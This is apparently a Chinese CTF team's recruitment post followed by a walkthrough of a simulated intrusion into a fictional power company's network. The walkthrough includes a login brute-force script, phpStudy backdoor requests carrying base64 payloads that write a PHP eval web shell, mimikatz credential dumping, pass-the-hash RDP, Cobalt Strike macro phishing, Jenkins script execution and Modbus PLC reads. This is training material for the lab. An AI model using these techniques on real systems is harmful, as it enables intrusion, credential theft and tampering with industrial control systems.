招新
N0wayBack
-招新说明-
招新要求
· CTF赛龄1年以上
· 热爱网络安全,喜欢CTF
· 无人际交流障碍,不以阴阳怪气为乐;乐于奉献、热爱分享,愿意提升 自己同时帮助他人
· 时间允许参加各类赛事,服从战队管理与安排
· 各类比赛获奖者、能力出众者视情况考量
· 未参与其他高校联队
· 大一同学视情况放宽资历要求
联系方式
发送简历于邮箱
· 简历邮箱:[email protected]
招
· CTF赛龄1年以上
· 热爱网络安全,喜欢CTF
· 无人际交流障碍,不以阴阳怪气为乐;乐于奉献、热爱分享,愿意提升 自己同时帮助他人
· 时间允许参加各类赛事,服从战队管理与安排
· 各类比赛获奖者、能力出众者视情况考量
· 未参与其他高校联队
· 大一同学视情况放宽资历要求
发送简历于邮箱
· 简历邮箱:[email protected]
此份 wp 与xrntkk 师傅共同完成,感谢 l1n3 师傅的帮助。
chu0✌️的话:
欢迎加入nk捏
flag1
❝
关卡剧情:特工 V 你好,我们收到举报怀疑X市易电控制系统有限责任公司可能存在与虚拟货币挖矿有不正当的商业关系,现委托你协助对该公司进行调查取证,完成本次特别行动。本次行动代号为“电鳗”,按照组织执行标准,请先解密数据,本数据使用第四代 Rivest 技术加密,数据内容如下:
U2FsdGVkX19Inyq1HPE5sERtI1rHJkxrAnfKGVZYLwN82iSftU2hqTS16EcOZg2wRxZcSeOH8RgSqlQFOt8SdA==
RC4 密钥是靶标英文名
信息收集
39.98.117.59:22 open39.98.117.59:80 open[*] alive ports len is: 2start vulscan[*] WebTitle http://39.98.117.59 code:302 len:0 title:None 跳转url: http://39.98.117.59/sys/index.php[*] WebTitle http://39.98.117.59/sys/index.php code:200 len:131 title:None39.99.233.71:22 open39.99.233.71:8080 open39.99.233.71:80 open[*] alive ports len is: 3start vulscan[*] WebTitle http://39.99.233.71 code:200 len:20069 title:易电科技 - 易电科技[*] WebTitle http://39.99.233.71:8080 code:200 len:2299 title:ePowerflag2
❝
关卡剧情:获取到易电公司的通讯录,在通讯录中找到 flag。
先看第二个网站
这里可以爆破用户名,如果用户名存在,在输入错误几次密码之后会返回用户被锁定,如果不存在则会一直提示用户密码错误,写个脚本跑一下存在的用户,这里字典就不提供了
import requestswith open('ComPanyName.txt','r') as passs: for mpass in passs: mpass = mpass.strip() for i in range(0,6): try: burp0_url = "http://39.99.133.183:80/sys/index.php?m=user&f=login" burp0_cookies = {"rid": "90krpqj2986s2qss8fuolgoogg", "lang": "zh-cn", "theme": "default"} burp0_headers = {"X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36", "Accept": "application/json, text/javascript, */*; q=0.01", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://39.99.133.183", "Referer": "http://39.99.133.183/sys/index.php?m=user&f=login", "Accept-Encoding": "gzip, deflate, br", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"} burp0_data = {"account": f"{mpass}", "password": "23079896abb4553b11ad2d3e557485a8", "referer": "http://39.99.133.183/sys/index.php?m=user&f=login", "rawPassword": "202cb962ac59075b964b07152d234b70", "keepLogin": "false"} r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) except: print(f"nonono:{mpass}") break if '\u9501\u5b9a' in r.text: print(mpass) break最后可以得到几个用户,再跑弱口令,最后可以使用如下用户成功登录
zhangwei/123456在团队-同事中可以找到第二个flag
flag3
❝
关卡剧情:登录易电公司的 VPN,登录后访问 http://172.28.20.2:88/ 获得 flag。
访问第二个网站,有一个8080端口可以下载VPN文件,但是这里vpn里写的证书过期了,所以我们用的时候需要修改一下本地时间在证书有效时间内,否则vpn无法正常连接
点击下载配置文件,修改本地时间,这里时间在2023 年 01 月 04 日 12:35:43到2025 年 04 月 08 日 12:35:43之间即可,至于怎么来的可以自行丢ai分析
date -s "2024-01-01 00:00:00"连接VPN
openvpn ePower.ovpn账号密码输入zhangwei/123456即可
访问网站即可得到flag
http://172.28.20.2:88/
内网扫描
10.x
172.28.10.10:22 open172.28.10.10:80 open172.28.10.20:22 open172.28.10.20:80 open172.28.10.10:8080 open[*] alive ports len is: 5start vulscan[*] WebTitle: http://172.28.10.20 code:302 len:0 title:None 跳转url: http://172.28.10.20/sys/index.php[*] WebTitle: http://172.28.10.10 code:200 len:20069 title:易电科技 - 易电科技[*] WebTitle: http://172.28.10.10:8080 code:200 len:2299 title:ePower[*] WebTitle: http://172.28.10.20/sys/index.php code:200 len:131 title:None20.x
172.28.20.101:22 open172.28.20.102:22 open172.28.20.2:25 open172.28.20.1:53 open172.28.20.1:139 open172.28.20.2:139 open172.28.20.1:135 open172.28.20.2:135 open172.28.20.101:222 open172.28.20.2:389 open172.28.20.1:389 open172.28.20.1:445 open172.28.20.2:445 open172.28.20.1:464 open172.28.20.2:465 open172.28.20.101:80 open172.28.20.2:110 open172.28.20.2:88 open172.28.20.2:143 open172.28.20.2:80 open172.28.20.1:88 open172.28.20.1:593 open172.28.20.1:636 open172.28.20.2:993 open172.28.20.2:995 open172.28.20.1:3268 open172.28.20.1:3269 open172.28.20.2:3389 open172.28.20.1:3389 open172.28.20.2:6000 open172.28.20.2:6020 open172.28.20.2:6021 open172.28.20.2:6443 open172.28.20.2:6989 open172.28.20.2:6990 open172.28.20.102:8080 open172.28.20.1:9389 open172.28.20.2:47001 open172.28.20.1:47001 open172.28.20.2:49664 open172.28.20.1:49664 open172.28.20.2:49665 open172.28.20.1:49665 open172.28.20.2:49666 open172.28.20.1:49666 open172.28.20.2:49667 open172.28.20.1:49667 open172.28.20.2:49668 open172.28.20.1:49668 open172.28.20.2:49669 open172.28.20.1:49669 open172.28.20.2:49670 open172.28.20.1:49673 open172.28.20.2:49674 open172.28.20.1:49676 open172.28.20.1:49677 open172.28.20.1:49680 open172.28.20.1:49689 open172.28.20.1:49716 open172.28.20.1:62290 open[*] alive ports len is: 60start vulscan[*] NetInfo:[*]172.28.20.1 [->]DC [->]172.28.20.1[*] WebTitle: http://172.28.20.101 code:200 len:13646 title:ePower Git[*] NetInfo:[*]172.28.20.2 [->]MAIL [->]172.28.20.2[*] NetBios: 172.28.20.1 [+]DC EPOWERDC [*] NetBios: 172.28.20.2 EPOWERMAIL [*] WebTitle: http://172.28.20.1:47001 code:404 len:315 title:Not Found[*] WebTitle: http://172.28.20.2:6443 code:400 len:287 title:400 Bad Request[*] WebTitle: http://172.28.20.2:47001 code:404 len:315 title:Not Found[*] WebTitle: http://172.28.20.2:88 code:200 len:781 title:IIS Windows Server[*] WebTitle: http://172.28.20.2 code:200 len:9863 title:WebMail | Powered by Winmail Server - 登录[+] InfoScan:http://172.28.20.101 [Gitea简易Git服务] [*] WebTitle: http://172.28.20.102:8080 code:403 len:541 title:None30.x
172.28.30.10:80 open172.28.30.10:135 open172.28.30.30:139 open172.28.30.20:135 open172.28.30.20:139 open172.28.30.10:139 open172.28.30.40:139 open172.28.30.40:135 open172.28.30.30:135 open172.28.30.30:445 open172.28.30.40:445 open172.28.30.20:445 open172.28.30.10:445 open172.28.30.10:3306 open172.28.30.40:3389 open172.28.30.20:3389 open172.28.30.30:3389 open172.28.30.10:3389 open172.28.30.20:47001 open172.28.30.40:47001 open172.28.30.10:47001 open172.28.30.30:47001 open172.28.30.10:49664 open172.28.30.20:49664 open172.28.30.30:49664 open172.28.30.40:49664 open172.28.30.30:49665 open172.28.30.20:49665 open172.28.30.40:49665 open172.28.30.10:49667 open172.28.30.10:49666 open172.28.30.20:49667 open172.28.30.20:49668 open172.28.30.10:49668 open172.28.30.40:49667 open172.28.30.40:49666 open172.28.30.30:49666 open172.28.30.20:49666 open172.28.30.10:49665 open172.28.30.40:49668 open172.28.30.20:49669 open172.28.30.30:49668 open172.28.30.10:49669 open172.28.30.40:49669 open172.28.30.30:49670 open172.28.30.30:49672 open172.28.30.10:49671 open172.28.30.40:49670 open172.28.30.20:49670 open172.28.30.20:49677 open172.28.30.10:49676 open172.28.30.30:49676 open172.28.30.10:49674 open172.28.30.40:49677 open172.28.30.30:49669 open172.28.30.30:49679 open172.28.30.20:49683 open172.28.30.40:49683 open[*] alive ports len is: 58start vulscan[*] NetInfo:[*]172.28.30.10 [->]EP-1117 [->]172.28.30.10[*] WebTitle: http://172.28.30.10 code:200 len:29 title:None[*] NetInfo:[*]172.28.30.40 [->]EP-1131 [->]172.28.30.40[*] NetInfo:[*]172.28.30.20 [->]EP-1122 [->]172.28.30.20[*] WebTitle: http://172.28.30.20:47001 code:404 len:315 title:Not Found[*] NetBios: 172.28.30.30 EPOWEREP-1132 [*] NetBios: 172.28.30.10 EPOWEREP-1117 [*] NetBios: 172.28.30.40 EPOWEREP-1131 [*] WebTitle: http://172.28.30.30:47001 code:404 len:315 title:Not Found[*] NetBios: 172.28.30.20 EPOWEREP-1122 [*] WebTitle: http://172.28.30.10:47001 code:404 len:315 title:Not Found[*] WebTitle: http://172.28.30.40:47001 code:404 len:315 title:Not Found[+] http://172.28.30.10 poc-yaml-phpstudy-backdoor-rce flag4
❝
关卡剧情:获取易电公司内部资产表,并获得 flag。
先打phpstudy的那个rce
GET / HTTP/1.1Host: 172.28.30.10Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip,deflateAccept-Charset: c3lzdGVtKCJkaXIiKTs=Accept-Language: zh-CN,zh;q=0.9Connection: closedir获取目录位置
写shell
GET / HTTP/1.1Host: 172.28.30.10Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip,deflateAccept-Charset: ZnB1dHMoZm9wZW4oJ0M6XFVzZXJzXHdhbmdnYW5nXERlc2t0b3BccGhwU3R1ZHlcUEhQVHV0b3JpYWxcV1dXXHNoZWxsLnBocCcsJ3cnKSwnPD9waHAgQGV2YWwoJF9QT1NUWzFdKTsgPz4nKTs=Accept-Language: zh-CN,zh;q=0.9Connection: close
在wanggang目录下拿到资产表
可以得到其中的flag
flag5
❝
关卡剧情:获取开发部的个人机器权限,并获得 flag。
添加用户rdp上去
抓取密码
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit
cmd5解密,这里不用cmd5也行,直接用哈希去rdp即可
WG19891006..
我们用王刚的用户rdp机器,直接点开foxmail可以直接登录,后面需要发送钓鱼邮件,我们先搭建cs,我是在开vpn的机器上搭建的cs,IP为192.168.255.6,而我们的目标机器是无法访问到这台机器的,所以我们需要进行端口映射,将cs的上线端口映射到wanggang的机器上,进行上线,这里端口映射用的是frp,先做端口映射
frpc.ini
[common]server_addr = 172.28.30.10server_port = 7000[plugin_socks6]type = tcpremote_port = 60051local_port = 60051local_ip = 127.0.0.1frps.ini
[common]bind_port = 7000[tcp_1200]type = tcplocal_ip = 127.0.0.1local_port = 60051remote_port = 60051CS监听配置
生成宏代码
写入宏代码
将复制的宏代码贴上去即可
将邮件发送给开发部门人员即可
稍事等待即可上线
添加用户rdp
C盘根目录拿到flag
flag6
❝
关卡剧情:获得易电公司门户网站的源代码,并获得 flag。
上传mimikatz抓lixiaoliang的哈希
这次没爆出来,直接用哈希进行rdp吧
proxychains4 xfreerdp /u:lixiaoliang /d:epower.com /pth:7757a4190de1cf575d69b56d0a3eeac9 /v:172.28.30.20查看浏览器记录其实有不少东西
访问gittea
http://git.epower.com/lixiaoliang/www
账号密码可以自动填充,可以在这里找到第六个flag
flag7
❝
关卡剧情:入侵易电公司的门户网站,并获得 flag。
密码自动填充可以拿到很多信息,其中就包括用于测试的门户网站,利用工具抓取浏览器密码
admin/Adm!n586lixiaoliang/LiXL19871011...我们继续查看源码,可以得到后台地址,所以我们就可以尝试登录后台
登录成功
admin/Adm!n586任意文件下载可以得到flag,也可以拿shell
GET /admin_fe4c.php?m=ui&f=downloadtheme&theme=L2ZsYWc= HTTP/1.1Host: 39.99.138.0X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01Origin: http://39.99.138.0Referer: http://39.99.138.0/admin_fe4c.php?m=ui&f=settemplateAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cookie: frontsid=r2nj6gtgga53gp9ot08r0sig8l; frontLang=zh-cn; device=desktop; theme=default; adminsid=iful5n2db75aqjq6g4nosa60nn; adminLang=zh-cn; visualDevice=desktop; currentGroup=designConnection: close
flag8
❝
关卡剧情:获取 CI/CD 的服务器权限,并获得 flag。
这里说的应该就是jenkins,用上面得到的lixiaoliang的账密直接登录即可拿到shell
http://172.28.20.102:8080/login?from=%2F登录成功后
http://172.28.20.102:8080/manage/script直接代码执行即可
println "cat /flag".execute().text
flag9
❝
关卡剧情:获取财务部的个人机器权限,并获得 flag。
在王刚机器的邮箱记录里有个重置密码的记录,使用重置的密码尝试rdp
rdp成功,在C盘根目录找到flag
flag10
❝
关卡剧情:在 OA 系统中获取公司财务帐户信息,并在该信息页面找到 flag。
利用songzhicheng的账号访问zdoo,可以在记账-团队位置找到flag
flag11
❝
关卡剧情:获取工程生产部的个人机器权限,并获得 flag。
炒冷饭,用相同的钓鱼手法直接钓zhangyi即可,CS上线
在C盘根目录可以
flag12
❝
关卡剧情:获取 SCADA 主机权限,并在其中寻找 flag。
老样子,直接抓哈希然后rdp上去,这次是可以从域内直接抓到明文密码的
打开远程桌面,发现有一个连接记录,可以直接连接到scada的机器上
连接上去之后打开力控选第二个epower,然后点开发
点开就是flag了
flag13
❝
关卡剧情:在 PLC 中的某个寄存器中获得 flag。
点开那个modbus scanner可以得到plc的ip是172.30.0.10,直接上smod读读读
proxychains4 python2 smod.pySMOD >use modbus/function/readCoilsSMOD modbus(readCoils) >set RHOSTS 172.30.0.10SMOD modbus(readCoils) >set Quantity 500SMOD modbus(readCoils) >set UID 10SMOD modbus(readCoils) >exploit
写个脚本转换成二进制数据
def parse_coil_status(byte_array): coils = [] for byte in byte_array: for i in range(8): coils.append((byte >> i) & 1) return coilscoils = parse_coil_status([ 102, 54, 134, 230, 222, 108, 236, 236, 166, 38, 44, 28, 140, 180, 172, 140, 28, 76, 180, 44, 108, 108, 166, 180, 70, 44, 204, 28, 180, 70, 198, 134, 204, 236, 156, 102, 12, 172, 134, 172, 140, 190, 0, 0, 0, 0, 0, 0, 0, 0,])for i in coils: print(i,end="")解密即可得到最后一个flag
原文始发于微信公众号(N0wayBack):全网首发!「行动代号-电鳗」 WP by Chu0
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论